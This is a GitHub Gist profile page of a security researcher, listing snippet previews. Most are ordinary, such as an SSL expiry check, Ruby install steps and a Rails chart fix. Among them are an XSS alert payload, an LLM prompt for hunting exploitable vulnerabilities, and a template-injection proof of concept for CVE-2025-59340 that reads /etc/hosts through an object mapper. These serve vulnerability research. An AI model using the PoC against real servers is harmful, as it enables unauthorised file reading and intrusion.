Skip to content

Instantly share code, notes, and snippets.

View hahwul's full-sized avatar
🔥
I love coffee ☕️

HAHWUL hahwul

🔥
I love coffee ☕️
2.9k followers · 87 following
View GitHub Profile
@hahwul
hahwul / nel.md
Created February 24, 2026 12:12

You are ExploitableVulnHunter, the world's leading Application Security expert specialized in identifying ONLY real-world exploitable vulnerabilities in source code.

Your mission: Find vulnerabilities that have a genuine external attack surface — never report theoretical sinks. Every finding must have crystal-clear evidence of:

  • Untrusted Source
  • Full data flow / call chain
  • Reachable Entry Point from outside (proven by noir output)
  • Bypass of all sanitization, validation, and framework protections

Core Principles:

  • Evidence is mandatory — no evidence = False Positive (FP).
@hahwul
hahwul / nil.js
Created January 19, 2026 05:14
alert(document.location.href)
@hahwul
hahwul / CVE-2025-59340.jinja
Created November 17, 2025 07:13
CVE-2025-59340 PoC
{% set mapper = ____int3rpr3t3r____.config.objectMapper %}
{{ mapper.enableDefaultTyping() }}
{% set file = mapper.readValue('"file:///etc/hosts"', mapper.getTypeFactory().constructFromCanonical('java.net.URL')) %}
{% set inputStream = file.openStream() %}
{% set bytes = inputStream.readAllBytes() %}
{% set stringType = mapper.getTypeFactory().constructFromCanonical('java.lang.String') %}
{% set content = mapper.convertValue(bytes, stringType) %}
{{ content }}
@hahwul
hahwul / for_test.sh
Created April 25, 2025 15:23
for_test
#!/bin/bash
dalfox server > /dev/null 2>&1 &
DALFOX_PID=$!
sleep 2
curl --request POST \
--url http://localhost:6664/scan \
--header 'Content-Type: application/json' \
@hahwul
hahwul / check_ssl_expire.sh
Created January 16, 2025 02:13
Check the SSL expiration
echo "www.hahwul.com" | xargs -I % openssl s_client -connect %:443 -servername % 2>/dev/null | openssl x509 -noout -dates
@hahwul
hahwul / postgresql_is_enough.md
Created December 10, 2024 01:04 — forked from cpursley/postgresql_is_enough.md
Postgres is Enough
@hahwul
hahwul / bonny.sh
Last active December 21, 2024 14:40
Bonny
# RVM
\curl -sSL https://get.rvm.io | bash
# Ruby
rvm install ruby-3.3.6
rvm use ruby-3.3.6
# Rails
gem install rails
@hahwul
hahwul / diff.sh
Created August 22, 2024 11:58
https://x.com/hahwul/status/1826589634308247981
#!/bin/bash
URL="https://pocs.hahwul.com/xss.js" # Target
NEW_FILE="new_body.txt"
OLD_FILE="old_body.txt"
wget -qO- "$URL" > "$NEW_FILE"
if [ -f "$OLD_FILE" ]; then
if ! diff -q "$OLD_FILE" "$NEW_FILE" > /dev/null; then
@hahwul
hahwul / !!Postviewer.md
Created June 24, 2024 00:33 — forked from terjanq/!!Postviewer.md
Game Arcade & Postviewer v3 writeups by @terjanq

Postviewer v3 writeup by @terjanq

As it always have been with my challenges for Google CTF, they are based on real bugs I found internally. This year is a bit different though. This time the bugs were crafted by no other than me myself. One bug didn't manage to reach the production and the other is still present in prod making it effectively a 0day!

Both of my challenges (Postviewer v3 & Game Arcade) for this year are related to a sandboxing I've been working since the first postviewer challenge. You can read a little bit about it in

@hahwul
hahwul / index.html.erb
Created February 29, 2024 07:48
rails-charts(echarts) auto-resizing
<%= area_chart Rails.cache.read("data1") %>
<%= area_chart Rails.cache.read("data2") %>
<%= area_chart Rails.cache.read("data3") %>
<script>
let eChartTriggerList = document.querySelectorAll('[id^="rails_charts_"]')
window.addEventListener('resize', function() {
let eChartList = [...eChartTriggerList].map(eChartTriggerEl => echarts.init(eChartTriggerEl).resize())
});
</script>